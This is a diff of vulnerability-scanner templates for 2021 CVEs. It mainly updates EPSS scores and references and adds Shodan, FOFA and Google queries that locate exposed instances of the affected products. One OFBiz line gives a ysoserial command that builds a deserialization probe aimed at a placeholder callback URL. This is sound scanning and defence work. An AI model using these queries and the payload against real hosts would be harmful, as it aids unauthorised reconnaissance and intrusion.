b/http/cves/2021/CVE-2021-25067.yaml @@ -13,13 +13,15 @@ info: - https://wpscan.com/vulnerability/365007f0-61ac-4e81-8a3a-3a068f2c84bc - https://wordpress.org/plugins/page-builder-add/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25067 + - https://github.com/kazet/wpgarlic + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-25067 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.285 + epss-percentile: 0.29862 cpe: cpe:2.3:a:pluginops:landing_page:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml index 9a171705a1..5cbce79e79 100644 --- a/http/cves/2021/CVE-2021-25075.yaml +++ b/http/cves/2021/CVE-2021-25075.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-25075 cwe-id: CWE-862 epss-score: 0.00071 - epss-percentile: 0.28959 + epss-percentile: 0.30442 cpe: cpe:2.3:a:wpdevart:duplicate_page_or_post:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml index 40a84382ea..ae07f65a34 100644 --- a/http/cves/2021/CVE-2021-25078.yaml +++ b/http/cves/2021/CVE-2021-25078.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25078 cwe-id: CWE-79 epss-score: 0.00382 - epss-percentile: 0.72505 + epss-percentile: 0.72963 cpe: cpe:2.3:a:wpaffiliatemanager:affiliates_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25079.yaml b/http/cves/2021/CVE-2021-25079.yaml index 8966b0c494..f116995a9c 100644 --- a/http/cves/2021/CVE-2021-25079.yaml +++ b/http/cves/2021/CVE-2021-25079.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25079 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40882 + epss-percentile: 0.41295 cpe: cpe:2.3:a:crmperks:contact_form_entries:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25085.yaml b/http/cves/2021/CVE-2021-25085.yaml index 4dfb9568de..eba5ae5a8a 100644 --- a/http/cves/2021/CVE-2021-25085.yaml +++ b/http/cves/2021/CVE-2021-25085.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-25085 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:pluginus:woocommerce_products_filter:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml index 9ad8526fe2..437a7437e3 100644 --- a/http/cves/2021/CVE-2021-25099.yaml +++ b/http/cves/2021/CVE-2021-25099.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-25099 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml index 01f582930c..4fe58eeb3a 100644 --- a/http/cves/2021/CVE-2021-25111.yaml +++ b/http/cves/2021/CVE-2021-25111.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-25111 cwe-id: CWE-601 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index 6b5942531e..cf4851f126 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-25114 cwe-id: CWE-89 - epss-score: 0.0412 - epss-percentile: 0.91962 + epss-score: 0.03548 + epss-percentile: 0.91594 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -31,6 +31,9 @@ info: product: paid_memberships_pro framework: wordpress google-query: inurl:"/wp-content/plugins/paid-memberships-pro" + publicwww-query: /wp-content/plugins/paid-memberships-pro/ + shodan-query: http.html:/wp-content/plugins/paid-memberships-pro/ + fofa-query: body=/wp-content/plugins/paid-memberships-pro/ tags: cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios http: diff --git a/http/cves/2021/CVE-2021-25120.yaml b/http/cves/2021/CVE-2021-25120.yaml index 88e63fa569..fa4359d96f 100644 --- a/http/cves/2021/CVE-2021-25120.yaml +++ b/http/cves/2021/CVE-2021-25120.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-25120 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:easysocialfeed:easy_social_feed:*:*:*:*:pro:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25281.yaml b/http/cves/2021/CVE-2021-25281.yaml index 6c3a1daa56..12959a1a31 100644 --- a/http/cves/2021/CVE-2021-25281.yaml +++ b/http/cves/2021/CVE-2021-25281.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-25281 cwe-id: CWE-287 epss-score: 0.87406 - epss-percentile: 0.98556 + epss-percentile: 0.98631 cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index bcf503b7ff..c22b08f84c 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25296 cwe-id: CWE-78 - epss-score: 0.89514 - epss-percentile: 0.98511 + epss-score: 0.89037 + epss-percentile: 0.98721 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" + fofa-query: title="nagios xi" + google-query: intitle:"nagios xi" tags: cve,cve2021,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios http: diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index 389f33f82b..d946f96fb6 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25297 cwe-id: CWE-78 - epss-score: 0.90211 - epss-percentile: 0.98732 + epss-score: 0.89037 + epss-percentile: 0.98721 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" + fofa-query: title="nagios xi" + google-query: intitle:"nagios xi" tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios http: diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index 214437d510..9348bd038d 100644 --- a/http/cves/2021/CVE-2021-25298.yaml +++ b/http/cves/2021/CVE-2021-25298.yaml @@ -30,6 +30,8 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" + fofa-query: title="nagios xi" + google-query: intitle:"nagios xi" tags: cve2021,cve,packetstorm,oast,authenticated,msf,nagiosxi,rce,kev,nagios http: diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml index 13c30457a9..83d6bb74ef 100644 --- a/http/cves/2021/CVE-2021-25299.yaml +++ b/http/cves/2021/CVE-2021-25299.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25299 cwe-id: CWE-79 - epss-score: 0.96845 - epss-percentile: 0.99634 + epss-score: 0.9644 + epss-percentile: 0.99577 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" + fofa-query: title="nagios xi" + google-query: intitle:"nagios xi" tags: cve2021,cve,nagios,nagiosxi,xss,authenticated http: diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml index ea7c8c4f6c..e8c2507f0a 100644 --- a/http/cves/2021/CVE-2021-25646.yaml +++ b/http/cves/2021/CVE-2021-25646.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25646 cwe-id: CWE-732 - epss-score: 0.97323 - epss-percentile: 0.99871 + epss-score: 0.97385 + epss-percentile: 0.99912 cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml index 67c822816a..f7281998c8 100644 --- a/http/cves/2021/CVE-2021-25864.yaml +++ b/http/cves/2021/CVE-2021-25864.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25864 cwe-id: CWE-22 epss-score: 0.29108 - epss-percentile: 0.96769 + epss-percentile: 0.96881 cpe: cpe:2.3:a:dgtl:huemagic:3.0.0:*:*:*:*:node.js:*:* metadata: max-request: 1 @@ -28,6 +28,8 @@ info: product: huemagic framework: node.js shodan-query: title:"NODE-RED" + fofa-query: title="node-red" + google-query: intitle:"node-red" tags: cve2021,cve,huemagic,lfi,dgtl,node.js http: diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index 1042351d65..5a45e0c1fc 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -28,6 +28,7 @@ info: vendor: void product: aurall_rec_monitor shodan-query: html:"AURALL" + fofa-query: body="aurall" tags: cve2021,cve,sqli,void,aurall http: diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml index e5f4fea18f..8ddeda2511 100644 --- a/http/cves/2021/CVE-2021-26084.yaml +++ b/http/cves/2021/CVE-2021-26084.yaml @@ -20,14 +20,15 @@ info: cvss-score: 9.8 cve-id: CVE-2021-26084 cwe-id: CWE-917 - epss-score: 0.97414 - epss-percentile: 0.99924 + epss-score: 0.97447 + epss-percentile: 0.99948 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: max-request: 13 vendor: atlassian product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" + fofa-query: app="atlassian-confluence" tags: cve2021,cve,rce,confluence,injection,ognl,kev,atlassian http: diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml index 9a2bfe2a98..d679522076 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -14,19 +14,21 @@ info: - https://jira.atlassian.com/browse/CONFSERVER-67893 - https://nvd.nist.gov/vuln/detail/CVE-2021-26085 - http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html + - https://github.com/e-hakson/OSCP classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-26085 cwe-id: CWE-425 - epss-score: 0.96595 - epss-percentile: 0.99535 + epss-score: 0.95896 + epss-percentile: 0.9945 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: atlassian product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" + fofa-query: app="atlassian-confluence" tags: cve2021,cve,kev,packetstorm,confluence,atlassian,lfi,intrusive http: diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index ade22c35b2..f075b6d22c 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-26086 cwe-id: CWE-22 - epss-score: 0.54993 - epss-percentile: 0.97368 + epss-score: 0.91202 + epss-percentile: 0.98861 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml index aed11f963e..5504605411 100644 --- a/http/cves/2021/CVE-2021-26247.yaml +++ b/http/cves/2021/CVE-2021-26247.yaml @@ -20,12 +20,15 @@ info: cve-id: CVE-2021-26247 cwe-id: CWE-79 epss-score: 0.00255 - epss-percentile: 0.647 + epss-percentile: 0.65308 cpe: cpe:2.3:a:cacti:cacti:0.8.7g:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cacti product: cacti + fofa-query: icon_hash="-1797138069" + shodan-query: http.title:"login to cacti" + google-query: intitle:"cacti" tags: cve,cve2021,cacti,xss http: diff --git a/http/cves/2021/CVE-2021-26294.yaml b/http/cves/2021/CVE-2021-26294.yaml index e67e96c9ce..c78b2cb21c 100644 --- a/http/cves/2021/CVE-2021-26294.yaml +++ b/http/cves/2021/CVE-2021-26294.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-26294 cwe-id: CWE-22 - epss-score: 0.25543 - epss-percentile: 0.96591 + epss-score: 0.21969 + epss-percentile: 0.96457 cpe: cpe:2.3:a:afterlogic:aurora:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index 05427b7d89..bfe98d7bc2 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -32,6 +32,7 @@ info: product: ofbiz shodan-query: "OFBiz.Visitor=" ysoserial-payload: java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex + fofa-query: body="ofbiz" tags: cve2021,cve,packetstorm,apache,ofbiz,deserialization,rce http: diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml index 71c38b508a..7508d6e350 100644 --- a/http/cves/2021/CVE-2021-26598.yaml +++ b/http/cves/2021/CVE-2021-26598.yaml @@ -20,14 +20,15 @@ info: cvss-score: 5.3 cve-id: CVE-2021-26598 cwe-id: CWE-287 - epss-score: 0.00506 - epss-percentile: 0.74005 + epss-score: 0.03958 + epss-percentile: 0.92001 cpe: cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: impresscms product: impresscms shodan-query: http.html:"ImpressCMS" + fofa-query: body="impresscms" tags: cve,cve2021,hackerone,impresscms,unauth,cms http: diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml index 8e73cc509d..e1273b45ce 100644 --- a/http/cves/2021/CVE-2021-26702.yaml +++ b/http/cves/2021/CVE-2021-26702.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-26702 cwe-id: CWE-79 epss-score: 0.00187 - epss-percentile: 0.55045 + epss-percentile: 0.55848 cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26710.yaml b/http/cves/2021/CVE-2021-26710.yaml index 98dabf79f1..df0d84a9e6 100644 --- a/http/cves/2021/CVE-2021-26710.yaml +++ b/http/cves/2021/CVE-2021-26710.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-26710 cwe-id: CWE-79 - epss-score: 0.00114 - epss-percentile: 0.44746 + epss-score: 0.00116 + epss-percentile: 0.45321 cpe: cpe:2.3:a:redwood:report2web:4.3.4.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26723.yaml b/http/cves/2021/CVE-2021-26723.yaml index 238d818436..d6a8460175 100644 --- a/http/cves/2021/CVE-2021-26723.yaml +++ b/http/cves/2021/CVE-2021-26723.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-26723 cwe-id: CWE-79 epss-score: 0.07461 - epss-percentile: 0.93477 + epss-percentile: 0.94099 cpe: cpe:2.3:a:jenzabar:jenzabar:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml index 5cf22dd0d8..f3a73b8679 100644 --- a/http/cves/2021/CVE-2021-26812.yaml +++ b/http/cves/2021/CVE-2021-26812.yaml @@ -12,13 +12,15 @@ info: reference: - https://github.com/udima-university/moodle-mod_jitsi/issues/67 - https://nvd.nist.gov/vuln/detail/CVE-2021-26812 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-26812 cwe-id: CWE-79 epss-score: 0.00464 - epss-percentile: 0.72797 + epss-percentile: 0.75413 cpe: cpe:2.3:a:jitsi:meet:*:*:*:*:*:moodle:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 3da3c8b5ab..69ea7ecfe0 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -27,6 +27,8 @@ info: vendor: microsoft product: exchange_server shodan-query: vuln:CVE-2021-26855 + fofa-query: title="outlook" + google-query: intitle:"outlook" tags: cve2021,cve,ssrf,rce,exchange,oast,microsoft,kev http: diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml index 3818af28ba..e9034cf85f 100644 --- a/http/cves/2021/CVE-2021-27124.yaml +++ b/http/cves/2021/CVE-2021-27124.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-27124 cwe-id: CWE-89 - epss-score: 0.01251 - epss-percentile: 0.85241 + epss-score: 0.01991 + epss-percentile: 0.88786 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml index f8a8753b88..580f90c681 100644 --- a/http/cves/2021/CVE-2021-27309.yaml +++ b/http/cves/2021/CVE-2021-27309.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-27309 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42925 + epss-percentile: 0.43249 cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index 257541a2b4..aaa515527c 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27315 cwe-id: CWE-89 - epss-score: 0.06768 - epss-percentile: 0.93718 + epss-score: 0.07849 + epss-percentile: 0.94222 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml index 79a39b0365..943ccdb933 100644 --- a/http/cves/2021/CVE-2021-27319.yaml +++ b/http/cves/2021/CVE-2021-27319.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27319 cwe-id: CWE-89 - epss-score: 0.08052 - epss-percentile: 0.9371 + epss-score: 0.07849 + epss-percentile: 0.94222 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml index 260320a154..bf34d7d00f 100644 --- a/http/cves/2021/CVE-2021-27320.yaml +++ b/http/cves/2021/CVE-2021-27320.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27320 cwe-id: CWE-89 - epss-score: 0.09267 - epss-percentile: 0.94102 + epss-score: 0.10551 + epss-percentile: 0.95011 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index 4053b5d34e..7ad3ed0325 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -30,6 +30,8 @@ info: vendor: triconsole product: datepicker_calendar google-query: intitle:TriConsole.com - PHP Calendar Date Picker + shodan-query: http.title:triconsole.com - php calendar date picker + fofa-query: title=triconsole.com - php calendar date picker tags: cve2021,cve,xss,edb,triconsole http: diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index 58de74b0b0..ee1176c56c 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -28,6 +28,8 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" + fofa-query: title="grafana" + google-query: intitle:"grafana" tags: cve2021,cve,grafana,unauth http: diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml index 459b0599d6..c59651b4f6 100644 --- a/http/cves/2021/CVE-2021-27519.yaml +++ b/http/cves/2021/CVE-2021-27519.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-27519 cwe-id: CWE-79 epss-score: 0.00217 - epss-percentile: 0.59015 + epss-percentile: 0.59671 cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: fudforum product: fudforum shodan-query: 'http.html:"Powered by: FUDforum"' + fofa-query: 'body="powered by: fudforum"' tags: cve2021,cve,xss,fudforum,edb,packetstorm http: diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index 4554d3323b..b3819d8e07 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-27520 cwe-id: CWE-79 epss-score: 0.00217 - epss-percentile: 0.59015 + epss-percentile: 0.59671 cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: fudforum product: fudforum shodan-query: html:"FUDforum" + fofa-query: 'body="powered by: fudforum"' tags: cve2021,cve,packetstorm,xss,fuddorum,edb,intrusive,fudforum http: diff --git a/http/cves/2021/CVE-2021-27561.yaml b/http/cves/2021/CVE-2021-27561.yaml index 92a0464ee2..445e72d342 100644 --- a/http/cves/2021/CVE-2021-27561.yaml +++ b/http/cves/2021/CVE-2021-27561.yaml @@ -13,13 +13,15 @@ info: - https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561 - https://ssd-disclosure.com/?p=4688 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-27561 cwe-id: CWE-78 - epss-score: 0.97434 - epss-percentile: 0.99939 + epss-score: 0.97435 + epss-percentile: 0.99942 cpe: cpe:2.3:a:yealink:device_management:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27651.yaml b/http/cves/2021/CVE-2021-27651.yaml index ffc078701e..fb6b0b26d1 100644 --- a/http/cves/2021/CVE-2021-27651.yaml +++ b/http/cves/2021/CVE-2021-27651.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27651 cwe-id: CWE-287 - epss-score: 0.07705 - epss-percentile: 0.94021 + epss-score: 0.06797 + epss-percentile: 0.93865 cpe: cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml index 36f6eed5f7..a407f4f20d 100644 --- a/http/cves/2021/CVE-2021-27670.yaml +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -29,6 +29,8 @@ info: vendor: appspace product: appspace shodan-query: title:"Appspace" + fofa-query: title="appspace" + google-query: intitle:"appspace" tags: cve,cve2021,appspace,ssrf http: diff --git a/http/cves/2021/CVE-2021-27850.yaml b/http/cves/2021/CVE-2021-27850.yaml index e174da05da..a52441a726 100644 --- a/http/cves/2021/CVE-2021-27850.yaml +++ b/http/cves/2021/CVE-2021-27850.yaml @@ -15,12 +15,13 @@ info: - https://lists.apache.org/thread.html/r237ff7f286bda31682c254550c1ebf92b0ec61329b32fbeb2d1c8751%40%3Cusers.tapestry.apache.org%3E - http://www.openwall.com/lists/oss-security/2021/04/15/1 - https://security.netapp.com/advisory/ntap-20210528-0002/ + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-27850 cwe-id: CWE-502,CWE-200 - epss-score: 0.97388 + epss-score: 0.9737 epss-percentile: 0.99903 cpe: cpe:2.3:a:apache:tapestry:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml index ad2247e6cc..81332d6f7a 100644 --- a/http/cves/2021/CVE-2021-27905.yaml +++ b/http/cves/2021/CVE-2021-27905.yaml @@ -26,6 +26,9 @@ info: max-request: 2 vendor: apache product: solr + shodan-query: cpe:"cpe:2.3:a:apache:solr" + fofa-query: title="solr admin" + google-query: intitle:"apache solr" tags: cve2021,cve,apache,solr,ssrf http: diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index 9d8da927e5..5d3ffad92e 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-27909 cwe-id: CWE-79 - epss-score: 0.00094 - epss-percentile: 0.3927 + epss-score: 0.00101 + epss-percentile: 0.41606 cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: acquia product: mautic shodan-query: title:"Mautic" + fofa-query: title="mautic" + google-query: intitle:"mautic" tags: cve2021,cve,mautic,xss,acquia http: diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml index a24916763a..b408a5d4aa 100644 --- a/http/cves/2021/CVE-2021-27931.yaml +++ b/http/cves/2021/CVE-2021-27931.yaml @@ -12,13 +12,15 @@ info: reference: - https://github.com/sl4cky/LumisXP-XXE---POC/blob/main/poc.txt - https://nvd.nist.gov/vuln/detail/CVE-2021-27931 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H cvss-score: 9.1 cve-id: CVE-2021-27931 cwe-id: CWE-611 - epss-score: 0.4974 - epss-percentile: 0.97222 + epss-score: 0.60102 + epss-percentile: 0.97771 cpe: cpe:2.3:a:lumis:lumis_experience_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml index f2a6bb2e35..1a04e7cb59 100644 --- a/http/cves/2021/CVE-2021-28150.yaml +++ b/http/cves/2021/CVE-2021-28150.yaml @@ -13,13 +13,15 @@ info: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - http://en.hongdian.com/Products/Details/H8922 - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 + - https://github.com/SexyBeast233/SecBooks + - https://github.com/Threekiii/Awesome-POC classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.5 cve-id: CVE-2021-28150 cwe-id: CWE-425 epss-score: 0.00253 - epss-percentile: 0.63106 + epss-percentile: 0.6512 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-28164.yaml b/http/cves/2021/CVE-2021-28164.yaml index 5eb0b5cd04..e60e497167 100644 --- a/http/cves/2021/CVE-2021-28164.yaml +++ b/http/cves/2021/CVE-2021-28164.yaml @@ -21,13 +21,14 @@ info: cvss-score: 5.3 cve-id: CVE-2021-28164 cwe-id: CWE-200,NVD-CWE-Other - epss-score: 0.04805 - epss-percentile: 0.9254 + epss-score: 0.04765 + epss-percentile: 0.92672 cpe: cpe:2.3:a:eclipse:jetty:9.4.37:20210219:*:*:*:*:*:* 